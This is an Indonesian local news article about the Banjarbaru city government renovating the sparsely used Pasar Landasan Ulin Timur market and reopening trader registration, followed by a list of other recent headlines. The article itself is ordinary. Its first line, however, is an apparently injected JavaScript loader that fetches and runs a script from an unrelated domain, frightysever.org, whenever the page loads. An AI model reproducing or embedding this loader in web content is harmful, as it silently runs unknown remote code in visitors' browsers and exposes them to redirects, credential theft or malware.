(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Pasar Landasan Ulin Timur Sepi Pedagang, Pemko Lakukan Rahab dan Pendaftaran Pedagang


KANALKALIMANTAN.COM, BANJARBARU – Pasar Landasan Ulin Timur bakal dilakukan rehabilitasi untuk menyesuaikan keinginan pedagang. Hal ini bertujuan untuk menarik para pedagang berjualan di pasar ini.

Disamping itu, Pemko Banjarbaru akan membuka pendaftaran kedua bagi masyarakat untuk berjualan di Pasar Landasan Ulin ini.

Kepala Dinas Perdagangan melalui Kepala Bidang Pengelolaan Pasar, Soegiantoro membeberkan lika liku operasional Pasar Landasan Ulin Timur tersebut.

“Kita sudah dua kali membuka pendaftaran, dalam jangka satu bulan kita buka pendaftaran pertama peminatnya penuh dan sempat ramai pembeli sesuai dengan harapan kita,” ucapnya.

 

Baca juga  : Bawaslu HSU Tegaskan Aparatur Desa Tidak Boleh Jadi Tim Kampanye

Lanjutnya, namun seiring dengan waktu pembeli mulai berkurang dan para pedagang yang berjualan akhirnya mundur perlahan.

“Pasalnya di seputaran pasar Ladansan Ulin Timur ini banyak pasar yang dikelola masyarakat yang cukup strategis. Namun kita terus berupaya melakukan sosialisasi agar para pedagang kembali meramaikan pasar ini,” ujarnya.

Kemudian, Soegiantoro kembali menjelaskan, Pemerintah membuka kembali pendaftaran yang kedua untuk pedagang tetapi masih sepi peminat.

“Mereka (pedagang) minta bangun direhap kembali sesuai dengan keinginan pedagang. Sekarang di tahun 2022 Anggaran Belanja Tambahan (ABT) kita rehap, dan ini proses pengerjaan. Dalam proses rehab pasar tersebut ya memang terlihat sepi pedagang,” jelasnya.

Baca juga  : Tanah Amblas Tergerus Air Sungai, Rumah di Desa Bungin Nyaris Ambruk

Masih kata Soegiantoro, ada beberapa langkah strategis yang akan dilakukan Pemerintah untuk kembali meramaikan pasar ini, salah satunya akan diadakannya kegiatan pasar murah.

“Semoga kedepannya bisa meramaikan pasar dengan adanya kegiatan-kegiatan yang ada di Dinas Perdagangan Kota Banjarbaru,” harapnya.

Diinformasikan, langkah-langkah Pemerintah untuk menertibkan dan mengajak para pedagang yang berjualan diluar Pasar Landasan Ulin Timur, Pemerintah Kota  Banjarbaru melakukan solialisasi dan solusi bagi para pedagang agar ikut bergabung untuk bisa berjualan di Pasar Landasan Ulin Timur.

Di Pasar Landasan Ulin Timur ini, total ada sebanyak 40 lapak yang disediakan Pemerintah Kota Banjarbaru untuk para pedagang. Dan itu sudah ada yang mengisi, tetapi masih enggan untuk berjualan.

Baca juga  : Fasilitas Pasar Bauntung Banjarbaru Terus Dilengkapi, Bikin Pengunjung Betah Belanja!

Menghadapi hal tersebut, pada tahun depan Dinas Perdagangan Kota Banjarbaru akan mengevaluasi. Apabila pedagang tetap tidak juga berjualan setelah rampungnya rehab pasar tersebut, maka akan digantikan dengan pedagang yang lain yang lebih berminat.

Diketahui, bangunan Pasar Landasan Ulin Timur ini menggunakan Dana Alokasi Khusus (DAK) APBN,

dengan grand design dari Pemerintah Kota Banjarbaru. Namun seiring waktu berdirinya bangunan pasar, ternyata tidak sesuai dengan keinginan pedagang maka dari itu dilakukanlah rehabilitasi bangunan pasar tersebut pada tahun 2022.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : cell


Desy Arfianty

Recent Posts

Sah! Ini Nama 45 Calon Terpilih Anggota DPRD Kabupaten Banjar 2024-2029

Golkar dan Gerindra Masing-masing 8 Kursi, PDIP, Partai Gelora, dan PBB Kebagian 1 Kursi Read More

37 menit ago

Tok! KPU Banjarbaru Sahkan 30 Calon Terpilih Anggota DPRD Kota Banjarbaru, Ini Daftar Lengkapnya

13 Kursi Diisi Pendatang Baru, 17 Petahana Bertahan di Gedung Dewan Read More

4 jam ago

Buka Musrenbang RPJD 2025 – 2045, Ini Harapan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar Musrenbang… Read More

11 jam ago

Mahasiswa Prodi Gizi Belajar Penyelesaian Sengketa Medis di RSD Idaman

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 49 mahasiswa Diploma III Program Studi Gizi Poltekkes Kemenkes Banjarmasin melaksanakan… Read More

13 jam ago

Mahasiswa Minta Perbaikan Gaji Guru Honorer di Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unjuk rasa BEM se Kalimantan Selatan (Kalsel) di depan gedung DPRD Provinsi… Read More

13 jam ago

Mantan Crosser Ramaikan Pilkada Tala, H Iyan Ambil Formulir ke PPP

KANALKALIMANTAN.COM, PELAIHARI - Nama Haji Iriansyah mencuat di bursa Pemilihan Kepala Daerah (Pilkada) 2024 di… Read More

14 jam ago

This website uses cookies.